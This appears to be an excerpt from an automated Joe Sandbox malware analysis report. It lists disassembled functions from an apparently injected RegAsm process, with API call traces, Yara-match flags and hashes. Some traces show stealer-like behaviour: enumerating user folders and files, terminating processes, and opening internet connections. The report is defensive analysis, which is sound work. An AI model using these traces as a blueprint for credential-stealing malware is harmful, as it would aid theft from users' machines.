Part of subcall function 6C014290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C053EBD,6C053EBD,00000000), ref: 6C0142A9

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
String ID:
API String ID: 2525797420-0
Opcode ID: a4dc9bfa1b8a7af4cd14b32059875f44c4f646e1c6fc2e00c9c18866e5757697
Instruction ID: d0a880919aec2a2deba2aa8fae3f6b6acc121942671c776a3d5ac17549f37fb2
Opcode Fuzzy Hash: a4dc9bfa1b8a7af4cd14b32059875f44c4f646e1c6fc2e00c9c18866e5757697
Instruction Fuzzy Hash: D041CF719087469BD700DF29C48066BFBF4FFCA254F604A2DE4A987650DB30E549CBD2

Function 6C056470 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C0582BC,?,?), ref: 6C05649B

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C0564A9

Part of subcall function 6C04FA80: GetCurrentThreadId.KERNEL32 ref: 6C04FA8D
Part of subcall function 6C04FA80: AcquireSRWLockExclusive.KERNEL32(6C09F448), ref: 6C04FA99

ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C05653F
free.MOZGLUE(?), ref: 6C05655A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfreemallocmemsetmoz_xmalloc
String ID:
API String ID: 3596744550-0
Opcode ID: 81f1547a73674c13bc3cd815168ea801e80265b0dc2fd4d4baea249873b3ccbf
Instruction ID: 0ed71fe36e7c6cc2693cfee1db741db5b6286c51bbde536a3aa51dd6b2a4f609
Opcode Fuzzy Hash: 81f1547a73674c13bc3cd815168ea801e80265b0dc2fd4d4baea249873b3ccbf
Instruction Fuzzy Hash: D0317EB5A047059FDB04CF25D980B9EBBE4BF88318F40842EE85A97741DB34F918CB92

Function 0041BD80 Relevance: 6.1, APIs: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 0041BDC5
_memmove.LIBCMT ref: 0041BDD9
_memmove.LIBCMT ref: 0041BE26
WriteFile.KERNEL32(00000000,?,66F59254,?,00000000,038F2528,?,00000001,038F2528,?,0041AE6B,?,00000001,038F2528,66F59254,?), ref: 0041BE45

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memmove$FileWritemalloc
String ID:
API String ID: 803809635-0
Opcode ID: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction ID: ef32b456043a7c40364d1b26fe1d6b34c9da03a70a3abd589478dda37aa5024c
Opcode Fuzzy Hash: f8d90d2511c155f796a90aa74a79be86cc9cbc5625099fdc230df8e4b929144d
Instruction Fuzzy Hash: FB318F75600704AFD765CF65E980BE7B7F8FB45740B40892FE94687A00DB74F9448B98

Function 004122B0 Relevance: 6.1, APIs: 4, Instructions: 88COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004122D7

Part of subcall function 00411D61: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
Part of subcall function 00411D61: HeapAlloc.KERNEL32(00000000), ref: 00411D73
Part of subcall function 00411D61: wsprintfW.USER32 ref: 00411D84

OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
CloseHandle.KERNEL32(00000000), ref: 00412392

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocCloseHandleOpenTerminate_memsetwsprintf
String ID:
API String ID: 2224742867-0
Opcode ID: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction ID: d389cef70183d5cd616f040657d4303a3a928023e9a5c5ea90d08b3fb0bb435f
Opcode Fuzzy Hash: 8d2f111dba6cb19f7d8687405dc9f393da82ae6e0468ba9acff790c296a2a6c5
Instruction Fuzzy Hash: 6B314D72A0121CAFDF20DF61DD849EEB7BDEB0A345F0400AAF909E2550D6399F848F56

Function 6C04FF60 Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,80000001,80000000,?,6C06D019,?,?,?,?,?,00000000,?,6C05DA31,00100000,?), ref: 6C04FFD3
memcpy.VCRUNTIME140(00000000,?,?,?,6C06D019,?,?,?,?,?,00000000,?,6C05DA31,00100000,?,?), ref: 6C04FFF5
free.MOZGLUE(?,?,?,?,?,6C06D019,?,?,?,?,?,00000000,?,6C05DA31,00100000,?), ref: 6C05001B
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,6C06D019,?,?,?,?,?,00000000,?,6C05DA31,00100000,?,?), ref: 6C05002A

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: memcpy$_invalid_parameter_noinfo_noreturnfree
String ID:
API String ID: 826125452-0
Opcode ID: 20bd19e9d98a12bd60627f34707bc7eafd4767315c454ef208a954586e77dd6c
Instruction ID: 6757c79d71bf7d7fabf9d72a38445be2eddab4a9922c46865ba56fd9e76ba6e1
Opcode Fuzzy Hash: 20bd19e9d98a12bd60627f34707bc7eafd4767315c454ef208a954586e77dd6c
Instruction Fuzzy Hash: 0B2106B2E002219BC7089E78DC949AFB7FAFB893247254338E525D7780EB30AD1182D1

Function 0041665F Relevance: 6.1, APIs: 4, Instructions: 73stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD

lstrcatA.KERNEL32(?,00000000), ref: 004166A7
lstrcatA.KERNEL32(?,00436B4C), ref: 004166C4
lstrcatA.KERNEL32(?), ref: 004166D7
lstrcatA.KERNEL32(?,00436B50), ref: 004166E9

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction ID: cfafa51994c6dd41316c3016dfe646ce489cf68115bfde9b3865c7b361435df3
Opcode Fuzzy Hash: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction Fuzzy Hash: FF21B57190021DAFCF54DF60DC46AD9B779EB08305F1040A6F549A3190EEBA9BC48F44

Function 6C077930 Relevance: 6.1, APIs: 4, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 6C02BF00: ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C077A3F), ref: 6C02BF11
Part of subcall function 6C02BF00: ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C077A3F), ref: 6C02BF5D
Part of subcall function 6C02BF00: ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C077A3F), ref: 6C02BF7E

?setprecision@std@@YA?AU?$_Smanip@_J@1@_J@Z.MSVCP140(?,00000012,00000000), ref: 6C077968
??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@_J@Z.MSVCP140(6C07A264,6C07A264), ref: 6C07799A

Part of subcall function 6C029830: free.MOZGLUE(?,?,?,6C077ABE), ref: 6C02985B

??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140 ref: 6C0779E0
??1ios_base@std@@UAE@XZ.MSVCP140 ref: 6C0779E8

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@??1?$basic_streambuf@??1ios_base@std@@??6?$basic_ostream@?init@?$basic_ios@?setprecision@std@@D@std@@@2@_J@1@_Smanip@_U?$_V01@_V?$basic_streambuf@free
String ID:
API String ID: 3421697164-0
Opcode ID: cab040de5f56e48dc6c7fbd08c9caec1203d958660009c912fdc48e9a7d7339f
Instruction ID: 8edc39620990bffeb3510a058d88812e0d8f287dba4305957abfcfdf2a7deb3f
Opcode Fuzzy Hash: cab040de5f56e48dc6c7fbd08c9caec1203d958660009c912fdc48e9a7d7339f
Instruction Fuzzy Hash: 64215935A043049FCB14DF18D889B9EBBF5FF89314F04886DE94A87365DB34A909CB92

Function 6C02B4E0 Relevance: 6.1, APIs: 4, Instructions: 54threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C02B4F5
AcquireSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C02B502
ReleaseSRWLockExclusive.KERNEL32(6C09F4B8), ref: 6C02B542
free.MOZGLUE(?), ref: 6C02B578

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: f3f020d605146e54eaf40b814a5b7d2e6a5b3999c322f4324aece232ef04a6e6
Instruction ID: dbb5c9ff06290a1fd5fc56a4f5e60ccfda06dfffa959f40524249908d6926bea
Opcode Fuzzy Hash: f3f020d605146e54eaf40b814a5b7d2e6a5b3999c322f4324aece232ef04a6e6
Instruction Fuzzy Hash: 6211E130A04B51C7D7218F29C400766B3F5FFD6319F10A70AE88A57A11EBB8B5D4C791

Function 6C053DE0 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,6C01F20E,?), ref: 6C053DF5
fputs.API-MS-WIN-CRT-STDIO-L1-1-0(6C01F20E,00000000,?), ref: 6C053DFC
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C053E06
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C053E0E

Part of subcall function 6C04CC00: GetCurrentProcess.KERNEL32(?,?,6C0131A7), ref: 6C04CC0D
Part of subcall function 6C04CC00: TerminateProcess.KERNEL32(00000000,00000003,?,?,6C0131A7), ref: 6C04CC16

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
String ID:
API String ID: 2787204188-0
Opcode ID: af066b46b2f071f5a2fab49d0602b8585994a3af8d33d7f869104fd8856d4ac0
Instruction ID: b8248eca55d1b70803814d78ef44cb8b6025302d6f22213393b1c2728ad43080
Opcode Fuzzy Hash: af066b46b2f071f5a2fab49d0602b8585994a3af8d33d7f869104fd8856d4ac0
Instruction Fuzzy Hash: 2EF01271A002087BDB01AF55DC41EAB377DEB46628F044024FE0957741DA35BD2986F7

Function 00410CC0 Relevance: 6.0, APIs: 4, Instructions: 39memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
HeapAlloc.KERNEL32(00000000), ref: 00410CDF
GetLocalTime.KERNEL32(?), ref: 00410CEB
wsprintfA.USER32 ref: 00410D16

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocLocalProcessTimewsprintf
String ID:
API String ID: 1243822799-0
Opcode ID: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction ID: 3361d4878da1eea6239f97e2bf75980f5f1ac49a34b78f17876420eca4585326
Opcode Fuzzy Hash: c7062ee0803dc682f4bd22a1f6830d1074b171fc43ac1dbb61c851727eb39e82
Instruction Fuzzy Hash: 4DF031B1900218BBDF14DFE59C059BF77BDAB0C616F001095F941E2180E6399A80D775

Function 00412166 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00414FAC,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FAC,?), ref: 00412181
GetFileSizeEx.KERNEL32(00000000,00414FAC,?,?,?,00414FAC,?), ref: 00412199
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121A4
CloseHandle.KERNEL32(00000000,?,?,?,00414FAC,?), ref: 004121AC

Memory Dump Source

Source File: 00000003.00000002.2381115562.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2381115562.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2381115562.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateSize
String ID:
API String ID: 4148174661-0
Opcode ID: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction ID: 87089636491fbed30b1748ff62e0772d8b8c37abbef2c6f1f22f5f972430845f
Opcode Fuzzy Hash: 7686551e53b7644eb34baed25e55cd4cc7a7d590d99c042858ac62be5e4dc265
Instruction Fuzzy Hash: 29F0A731641314FBFB14D7A0DD09FDA7AADEB08761F200250FE01E61D0D7B06F818669

Function 6C062050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C06205B
AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6C06201B,?,?,?,?,?,?,?,6C061F8F,?,?), ref: 6C062064
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C06208E
free.MOZGLUE(?,?,?,00000000,?,6C06201B,?,?,?,?,?,?,?,6C061F8F,?,?), ref: 6C0620A3

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 153805648303072e564e6910c0e6fccfe74b3272dfac87d712ef175ffa0bf17e
Instruction ID: 123d895bd0a5bdb91ae4fbe6da53322e9199f3e745620e592c6a1fbbd5bc47aa
Opcode Fuzzy Hash: 153805648303072e564e6910c0e6fccfe74b3272dfac87d712ef175ffa0bf17e
Instruction Fuzzy Hash: 1FF024711006008BD7208F07C88875BB7F8FF86334F00001AE54687B11CB75A805CB95

Function 6C0620B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C0620B7
AcquireSRWLockExclusive.KERNEL32(00000000,?,6C04FBD1), ref: 6C0620C0
ReleaseSRWLockExclusive.KERNEL32(00000000,?,6C04FBD1), ref: 6C0620DA
free.MOZGLUE(00000000,?,6C04FBD1), ref: 6C0620F1

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 2047719359-0
Opcode ID: 156ba253d3fd31ca605b43cd479d7e5d83fff6a396502f976b7edc240b6fcb5e
Instruction ID: 0630eb5ed1b55b9cd9cfdcb6cb515746fac518897c2adaad4c046299ac57d544
Opcode Fuzzy Hash: 156ba253d3fd31ca605b43cd479d7e5d83fff6a396502f976b7edc240b6fcb5e
Instruction Fuzzy Hash: C7E0E5356006148BC6309F26980874EB7FDFF86324B01062AE48AC3B01EB75F94686D5

Function 6C0685B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6C0685D3

Part of subcall function 6C02CA10: malloc.MOZGLUE(?), ref: 6C02CA26

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6C068725

Strings

map/set<T> too long, xrefs: 6C068720

Memory Dump Source

Source File: 00000003.00000002.2442231735.000000006C011000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C010000, based on PE: true

Associated: 00000003.00000002.2442205756.000000006C010000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442694201.000000006C08D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442772176.000000006C09E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2442798595.000000006C0A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c010000_RegAsm.jbxd

Similarity

API ID: Xlength_error@std@@mallocmoz_xmalloc
String ID: map/set<T> too long
API String ID: 3720097785-1285458680
Opcode ID: 2f00c4e49ad8a137be25da720efac657b12d1418d42860bc99ae652fe5335b67
Instruction ID: ae868ea3e4e39518875d7c53cf21b33eff7945ea3d44c673891cca1e337cbf95
Opcode Fuzzy Hash: 2f00c4e49ad8a137be25da720efac657b12d1418d42860bc99ae652fe5335b67
Instruction Fuzzy Hash: 235143B46046418FD701CF1AC194B5ABBF1BF4A318F18C29AE8595BB52C375E885CF92

Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
